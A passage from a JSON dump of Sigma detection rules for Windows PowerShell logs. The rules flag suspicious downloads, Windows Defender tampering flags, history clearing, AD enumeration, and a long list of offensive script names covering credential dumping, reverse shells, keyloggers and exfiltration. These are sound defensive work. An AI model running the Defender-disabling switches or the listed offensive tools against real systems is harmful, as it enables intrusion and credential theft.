(i.e doesn't exist). We're practically forced to use a regex.\n        # If you're already mapping and extracting the field, then obviously use that directly.\n        Data|re: 'HostId=[a-zA-Z0-9-]{36}\\s+EngineVersion='\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml",
    "content": "title: Suspicious PowerShell Download\nid: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-10-27\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection_webclient:\n        Data|contains: 'Net.WebClient'\n    selection_download:\n        Data|contains:\n            - '.DownloadFile('\n            - '.DownloadString('\n    condition: all of selection_*\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml",
    "content": "title: Use Get-NetTCPConnection\nid: b366adb4-d63d-422d-8a2c-186463b5ded0\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-10-27\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'Get-NetTCPConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp - PowerShell\nid: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\nrelated:\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    service: powershell-classic\ndetection:\n    selection:\n        Data|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml",
    "content": "title: Tamper Windows Defender - PSClassic\nid: ec19ebab-72dc-40e1-9728-4c0b805d722c\nrelated:\n    - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2\n      type: similar\nstatus: test\ndescription: Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-06-07\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_classic_provider_start\ndetection:\n    selection_set_mppreference:\n        Data|contains: 'Set-MpPreference'\n    selection_options_bool_allow:\n        Data|contains:\n            - '-dbaf $true'\n            - '-dbaf 1'\n            - '-dbm $true'\n            - '-dbm 1'\n            - '-dips $true'\n            - '-dips 1'\n            - '-DisableArchiveScanning $true'\n            - '-DisableArchiveScanning 1'\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableBehaviorMonitoring 1'\n            - '-DisableBlockAtFirstSeen $true'\n            - '-DisableBlockAtFirstSeen 1'\n            - '-DisableCatchupFullScan $true'\n            - '-DisableCatchupFullScan 1'\n            - '-DisableCatchupQuickScan $true'\n            - '-DisableCatchupQuickScan 1'\n            - '-DisableIntrusionPreventionSystem $true'\n            - '-DisableIntrusionPreventionSystem 1'\n            - '-DisableIOAVProtection $true'\n            - '-DisableIOAVProtection 1'\n            - '-DisableRealtimeMonitoring $true'\n            - '-DisableRealtimeMonitoring 1'\n            - '-DisableRemovableDriveScanning $true'\n            - '-DisableRemovableDriveScanning 1'\n            - '-DisableScanningMappedNetworkDrivesForFullScan $true'\n            - '-DisableScanningMappedNetworkDrivesForFullScan 1'\n            - '-DisableScanningNetworkFiles $true'\n            - '-DisableScanningNetworkFiles 1'\n            - '-DisableScriptScanning $true'\n            - '-DisableScriptScanning 1'\n            - '-MAPSReporting $false'\n            - '-MAPSReporting 0'\n            - '-drdsc $true'\n            - '-drdsc 1'\n            - '-drtm $true'\n            - '-drtm 1'\n            - '-dscrptsc $true'\n            - '-dscrptsc 1'\n            - '-dsmndf $true'\n            - '-dsmndf 1'\n            - '-dsnf $true'\n            - '-dsnf 1'\n            - '-dss $true'\n            - '-dss 1'\n    selection_options_actions_func:\n        Data|contains:\n            - 'HighThreatDefaultAction Allow'\n            - 'htdefac Allow'\n            - 'LowThreatDefaultAction Allow'\n            - 'ltdefac Allow'\n            - 'ModerateThreatDefaultAction Allow'\n            - 'mtdefac Allow'\n            - 'SevereThreatDefaultAction Allow'\n            - 'stdefac Allow'\n    condition: selection_set_mppreference and 1 of selection_options_*\nfalsepositives:\n    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml",
    "content": "title: Suspicious Non PowerShell WSMAN COM Provider\nid: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7\nstatus: test\ndescription: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.\nreferences:\n    - https://twitter.com/chadtilbury/status/1275851297770610688\n    - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\n    - https://github.com/bohops/WSMan-WinRM\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-24\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: powershell-classic\ndetection:\n    selection:\n        Data|contains: 'ProviderName=WSMan'\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=powershell'\n            - 'HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n    filter_main_host_application_null:\n        # Note: Since we're using the raw data field to match. There is no easy way to filter out cases where the \"HostApplication\" field is null (i.e doesn't exist). We're practically forced to use a regex.\n        # If you're already mapping and extracting the field, then obviously use that directly.\n        Data|re: 'HostId=[a-zA-Z0-9-]{36}\\s+EngineVersion='\n    filter_optional_hexnode:\n        Data|contains: 'HostApplication=C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - PsModule\nid: 74176142-4684-4d8a-8b0a-713257e7df8e\nrelated:\n    - id: 70bc5215-526f-4477-963c-a47a5c9ebd12\n      type: similar\n    - id: 9e620995-f2d8-4630-8430-4afd89f77604\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_cmdlet:\n        Payload|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    selection_dll:\n        Payload|contains: 'Microsoft.ActiveDirectory.Management.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml",
    "content": "title: Alternate PowerShell Hosts - PowerShell Module\nid: 64e8e417-c19a-475a-8d19-98ea705394cc\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: '*'\n    filter_powershell:\n        # This filter covers the following use cases\n        #   - When powershell is called directly from commandline via keyword powershell or powershell.exe\n        #   - Or called via path but not with full \"\".exe\". Example: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell\n        ContextInfo|contains:\n            - '= powershell' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event\n            - '= C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - '= C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - '= C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - '= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n            # In some cases \\??\\C:.. is used\n            - '= \\\\\\?\\?\\C:Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - '= \\\\\\?\\?\\C:Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n    filter_sdiagnhost:\n        ContextInfo|contains: '= C:\\WINDOWS\\System32\\sdiagnhost.exe -Embedding' # When MSDT is launched for example\n    filter_citrix:\n        ContextInfo|contains: 'ConfigSyncRun.exe'\n    filter_adace:  # Active Directory Administrative Center Enhancements\n        ContextInfo|contains: 'C:\\Windows\\system32\\dsac.exe'\n    filter_winrm:\n        ContextInfo|contains: 'C:\\Windows\\system32\\wsmprovhost.exe -Embedding'\n    filter_help_update:\n        Payload|contains:\n            - 'Update-Help'\n            - 'Failed to update Help for the module'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter\n    - MSP Detection Searcher\n    - Citrix ConfigSync.ps1\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml",
    "content": "title: Bad Opsec Powershell Code Artifacts\nid: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86\nrelated:\n    - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3\n      type: derived\nstatus: test\ndescription: |\n    focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\n    Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\n    that often undergo minimal changes by attackers due to bad opsec.\nreferences:\n    - https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/\n    - https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\n    - https://www.mdeditor.tw/pl/pgRt\nauthor: 'ok @securonix invrep_de, oscd.community'\ndate: 2020-10-09\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains:\n            - '$DoIt'\n            - 'harmj0y'\n            - 'mattifestation'\n            - '_RastaMouse'\n            - 'tifkin_'\n            - '0xdeadbeef'\n    condition: selection_4103\nfalsepositives:\n    - 'Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.'\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml",
    "content": "title: Clear PowerShell History - PowerShell Module\nid: f99276ad-d122-4989-a09a-d00904a5f9d2\nrelated:\n    - id: dfba4ce1-e0ea-495f-986e-97140f31af2d\n      type: derived\nstatus: test\ndescription: Detects keywords that could indicate clearing PowerShell history\nreferences:\n    - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nauthor: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-25\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_1a_payload:\n        Payload|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'rm'\n    selection_1b_payload:\n        Payload|contains: '(Get-PSReadlineOption).HistorySavePath'\n    selection_payload_2:\n        Payload|contains|all:\n            - 'Set-PSReadlineOption'\n            - '–HistorySaveStyle'  # not sure if the homoglyph –/- is intended, just checking for both\n            - 'SaveNothing'\n    selection_payload_3:\n        Payload|contains|all:\n            - 'Set-PSReadlineOption'\n            - '-HistorySaveStyle'\n            - 'SaveNothing'\n    condition: 1 of selection_payload_* or all of selection_1*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml",
    "content": "title: PowerShell Decompress Commands\nid: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5\nrelated:\n    - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09\n      type: derived\nstatus: test\ndescription: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/8\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains: 'Expand-Archive'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml",
    "content": "title: Malicious PowerShell Scripts - PoshModule\nid: 41025fd7-0466-4650-a813-574aaacbe7f4\nrelated:\n    - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb\n      type: similar\n    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\n      type: obsolete\nstatus: test\ndescription: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance\nreferences:\n    - https://github.com/PowerShellMafia/PowerSploit\n    - https://github.com/NetSPI/PowerUpSQL\n    - https://github.com/CsEnox/EventViewer-UACBypass\n    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\n    - https://github.com/nettitude/Invoke-PowerThIEf\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-23\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_generic:\n        ContextInfo|contains:\n            - 'Add-ConstrainedDelegationBackdoor.ps1'\n            - 'Add-Exfiltration.ps1'\n            - 'Add-Persistence.ps1'\n            - 'Add-RegBackdoor.ps1'\n            - 'Add-RemoteRegBackdoor.ps1'\n            - 'Add-ScrnSaveBackdoor.ps1'\n            - 'BadSuccessor.ps1'\n            - 'Check-VM.ps1'\n            - 'ConvertTo-ROT13.ps1'\n            - 'Copy-VSS.ps1'\n            - 'Create-MultipleSessions.ps1'\n            - 'DNS_TXT_Pwnage.ps1'\n            - 'dnscat2.ps1'\n            - 'Do-Exfiltration.ps1'\n            - 'DomainPasswordSpray.ps1'\n            - 'Download_Execute.ps1'\n            - 'Download-Execute-PS.ps1'\n            - 'Enabled-DuplicateToken.ps1'\n            - 'Enable-DuplicateToken.ps1'\n            - 'Execute-Command-MSSQL.ps1'\n            - 'Execute-DNSTXT-Code.ps1'\n            - 'Execute-OnTime.ps1'\n            - 'ExetoText.ps1'\n            - 'Exploit-Jboss.ps1'\n            - 'Find-AVSignature.ps1'\n            - 'Find-Fruit.ps1'\n            - 'Find-GPOLocation.ps1'\n            - 'Find-TrustedDocuments.ps1'\n            - 'FireBuster.ps1'\n            - 'FireListener.ps1'\n            - 'Get-ApplicationHost.ps1'\n            - 'Get-ChromeDump.ps1'\n            - 'Get-ClipboardContents.ps1'\n            - 'Get-ComputerDetail.ps1'\n            - 'Get-FoxDump.ps1'\n            - 'Get-GPPAutologon.ps1'\n            - 'Get-GPPPassword.ps1'\n            - 'Get-IndexedItem.ps1'\n            - 'Get-Keystrokes.ps1'\n            - 'Get-LSASecret.ps1'\n            - 'Get-MicrophoneAudio.ps1'\n            - 'Get-PassHashes.ps1'\n            - 'Get-PassHints.ps1'\n            - 'Get-RegAlwaysInstallElevated.ps1'\n            - 'Get-RegAutoLogon.ps1'\n            - 'Get-RickAstley.ps1'\n            - 'Get-Screenshot.ps1'\n            - 'Get-SecurityPackages.ps1'\n            - 'Get-ServiceFilePermission.ps1'\n            - 'Get-ServicePermission.ps1'\n            - 'Get-ServiceUnquoted.ps1'\n            - 'Get-SiteListPassword.ps1'\n            - 'Get-System.ps1'\n            - 'Get-TimedScreenshot.ps1'\n            - 'Get-UnattendedInstallFile.ps1'\n            - 'Get-Unconstrained.ps1'\n            - 'Get-USBKeystrokes.ps1'\n            - 'Get-VaultCredential.ps1'\n            - 'Get-VulnAutoRun.ps1'\n            - 'Get-VulnSchTask.ps1'\n            - 'Get-WebConfig.ps1'\n            - 'Get-WebCredentials.ps1'\n            - 'Get-WLAN-Keys.ps1'\n            - 'Gupt-Backdoor.ps1'\n            - 'HTTP-Backdoor.ps1'\n            - 'HTTP-Login.ps1'\n            - 'Install-ServiceBinary.ps1'\n            - 'Install-SSP.ps1'\n            - 'Invoke-ACLScanner.ps1'\n            - 'Invoke-ADSBackdoor.ps1'\n            - 'Invoke-AmsiBypass.ps1'\n            - 'Invoke-ARPScan.ps1'\n            - 'Invoke-BackdoorLNK.ps1'\n            - 'Invoke-BadPotato.ps1'\n            - 'Invoke-BetterSafetyKatz.ps1'\n            - 'Invoke-BruteForce.ps1'\n            - 'Invoke-BypassUAC.ps1'\n            - 'Invoke-Carbuncle.ps1'\n            - 'Invoke-Certify.ps1'\n            - 'Invoke-ConPtyShell.ps1'\n            - 'Invoke-CredentialInjection.ps1'\n            - 'Invoke-CredentialsPhish.ps1'\n            - 'Invoke-DAFT.ps1'\n            - 'Invoke-DCSync.ps1'\n            - 'Invoke-Decode.ps1'\n            - 'Invoke-DinvokeKatz.ps1'\n            - 'Invoke-DllInjection.ps1'\n            - 'Invoke-DNSExfiltrator.ps1'\n            - 'Invoke-DowngradeAccount.ps1'\n            - 'Invoke-EgressCheck.ps1'\n            - 'Invoke-Encode.ps1'\n            - 'Invoke-EventViewer.ps1'\n            - 'Invoke-Eyewitness.ps1'\n            - 'Invoke-FakeLogonScreen.ps1'\n            - 'Invoke-Farmer.ps1'\n            - 'Invoke-Get-RBCD-Threaded.ps1'\n            - 'Invoke-Gopher.ps1'\n            - 'Invoke-Grouper2.ps1'\n            - 'Invoke-Grouper3.ps1'\n            - 'Invoke-HandleKatz.ps1'\n            - 'Invoke-Interceptor.ps1'\n            - 'Invoke-Internalmonologue.ps1'\n            - 'Invoke-Inveigh.ps1'\n            - 'Invoke-InveighRelay.ps1'\n            - 'Invoke-JSRatRegsvr.ps1'\n            - 'Invoke-JSRatRundll.ps1'\n            - 'Invoke-KrbRelay.ps1'\n            - 'Invoke-KrbRelayUp.ps1'\n            - 'Invoke-LdapSignCheck.ps1'\n            - 'Invoke-Lockless.ps1'\n            - 'Invoke-MalSCCM.ps1'\n            - 'Invoke-Mimikatz.ps1'\n            - 'Invoke-MimikatzWDigestDowngrade.ps1'\n            - 'Invoke-Mimikittenz.ps1'\n            - 'Invoke-MITM6.ps1'\n            - 'Invoke-NanoDump.ps1'\n            - 'Invoke-NetRipper.ps1'\n            - 'Invoke-NetworkRelay.ps1'\n            - 'Invoke-NinjaCopy.ps1'\n            - 'Invoke-OxidResolver.ps1'\n            - 'Invoke-P0wnedshell.ps1'\n            - 'Invoke-P0wnedshellx86.ps1'\n            - 'Invoke-Paranoia.ps1'\n            - 'Invoke-PortScan.ps1'\n            - 'Invoke-PoshRatHttp.ps1'\n            - 'Invoke-PoshRatHttps.ps1'\n            - 'Invoke-PostExfil.ps1'\n            - 'Invoke-PowerDump.ps1'\n            - 'Invoke-PowerDPAPI.ps1'\n            - 'Invoke-PowerShellIcmp.ps1'\n            - 'Invoke-PowerShellTCP.ps1'\n            - 'Invoke-PowerShellTcpOneLine.ps1'\n            - 'Invoke-PowerShellTcpOneLineBind.ps1'\n            - 'Invoke-PowerShellUdp.ps1'\n            - 'Invoke-PowerShellUdpOneLine.ps1'\n            - 'Invoke-PowerShellWMI.ps1'\n            - 'Invoke-PowerThIEf.ps1'\n            - 'Invoke-PPLDump.ps1'\n            - 'Invoke-Prasadhak.ps1'\n            - 'Invoke-PsExec.ps1'\n            - 'Invoke-PsGcat.ps1'\n            - 'Invoke-PsGcatAgent.ps1'\n            - 'Invoke-PSInject.ps1'\n            - 'Invoke-PsUaCme.ps1'\n            - 'Invoke-ReflectivePEInjection.ps1'\n            - 'Invoke-ReverseDNSLookup.ps1'\n            - 'Invoke-Rubeus.ps1'\n            - 'Invoke-RunAs.ps1'\n            - 'Invoke-SafetyKatz.ps1'\n            - 'Invoke-SauronEye.ps1'\n            - 'Invoke-SCShell.ps1'\n            - 'Invoke-Seatbelt.ps1'\n            - 'Invoke-ServiceAbuse.ps1'\n            - 'Invoke-SessionGopher.ps1'\n            - 'Invoke-ShellCode.ps1'\n            - 'Invoke-SMBScanner.ps1'\n            - 'Invoke-Snaffler.ps1'\n            - 'Invoke-Spoolsample.ps1'\n            - 'Invoke-SSHCommand.ps1'\n            - 'Invoke-SSIDExfil.ps1'\n            - 'Invoke-StandIn.ps1'\n            - 'Invoke-StickyNotesExtract.ps1'\n            - 'Invoke-Tater.ps1'\n            - 'Invoke-Thunderfox.ps1'\n            - 'Invoke-ThunderStruck.ps1'\n            - 'Invoke-TokenManipulation.ps1'\n            - 'Invoke-Tokenvator.ps1'\n            - 'Invoke-TotalExec.ps1'\n            - 'Invoke-UrbanBishop.ps1'\n            - 'Invoke-UserHunter.ps1'\n            - 'Invoke-VoiceTroll.ps1'\n            - 'Invoke-Whisker.ps1'\n            - 'Invoke-WinEnum.ps1'\n            - 'Invoke-winPEAS.ps1'\n            - 'Invoke-WireTap.ps1'\n            - 'Invoke-WmiCommand.ps1'\n            - 'Invoke-WScriptBypassUAC.ps1'\n            - 'Invoke-Zerologon.ps1'\n            - 'Keylogger.ps1'\n            - 'MailRaider.ps1'\n            - 'New-HoneyHash.ps1'\n            - 'OfficeMemScraper.ps1'\n            - 'Offline_Winpwn.ps1'\n            - 'Out-CHM.ps1'\n            - 'Out-DnsTxt.ps1'\n            - 'Out-Excel.ps1'\n            - 'Out-HTA.ps1'\n            - 'Out-Java.ps1'\n            - 'Out-JS.ps1'\n            - 'Out-Minidump.ps1'\n            - 'Out-RundllCommand.ps1'\n            - 'Out-SCF.ps1'\n            - 'Out-SCT.ps1'\n            - 'Out-Shortcut.ps1'\n            - 'Out-WebQuery.ps1'\n            - 'Out-Word.ps1'\n            - 'Parse_Keys.ps1'\n            - 'Port-Scan.ps1'\n            - 'PowerBreach.ps1'\n            - 'powercat.ps1'\n            - 'PowerRunAsSystem.psm1'\n            - 'PowerSharpPack.ps1'\n            - 'PowerUp.ps1'\n            - 'PowerUpSQL.ps1'\n            - 'PowerView.ps1'\n            - 'PSAsyncShell.ps1'\n            - 'RemoteHashRetrieval.ps1'\n            - 'Remove-Persistence.ps1'\n            - 'Remove-PoshRat.ps1'\n            - 'Remove-Update.ps1'\n            - 'Run-EXEonRemote.ps1'\n            - 'Schtasks-Backdoor.ps1'\n            - 'Set-DCShadowPermissions.ps1'\n            - 'Set-MacAttribute.ps1'\n            - 'Set-RemotePSRemoting.ps1'\n            - 'Set-RemoteWMI.ps1'\n            - 'Set-Wallpaper.ps1'\n            - 'Show-TargetScreen.ps1'\n            - 'Speak.ps1'\n            - 'Start-CaptureServer.ps1'\n            - 'Start-WebcamRecorder.ps1'\n            - 'StringToBase64.ps1'\n            - 'TexttoExe.ps1'\n            - 'Veeam-Get-Creds.ps1'\n            - 'VolumeShadowCopyTools.ps1'\n            - 'WinPwn.ps1'\n            - 'WSUSpendu.ps1'\n    selection_invoke_sharp:\n        ContextInfo|contains|all:\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - '.ps1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml",
    "content": "title: Suspicious Get-ADDBAccount Usage\nid: b140afd9-474b-4072-958e-2ebb435abd68\nstatus: test\ndescription: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers\nreferences:\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-16\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains|all:\n            - 'Get-ADDBAccount'\n            - 'BootKey '\n            - 'DatabasePath '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml",
